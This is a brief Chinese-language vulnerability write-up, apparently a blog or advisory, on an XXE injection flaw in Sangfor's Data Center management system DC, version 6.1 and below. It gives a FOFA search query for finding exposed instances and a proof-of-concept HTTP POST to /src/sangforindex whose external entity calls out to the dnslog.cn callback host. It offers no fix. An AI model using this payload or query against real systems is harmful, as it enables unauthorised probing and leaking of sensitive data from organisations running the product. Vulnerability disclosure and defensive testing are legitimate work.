0x01 产品简介
深信服数据中心管理系统DC为AC的外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。
0x02 漏洞概述
深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感信息。
0x03 影响范围
v6.1及以下版本
0x04 复现环境
FOFA: "SANGFOR 数据中心"
0x05 漏洞复现
PoC
POST /src/sangforindex HTTP/1.1
Host: your-ip
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
<!ENTITY rt SYSTEM "http://dnslog.cn">
]>
<xxx>
&rt;
</xxx></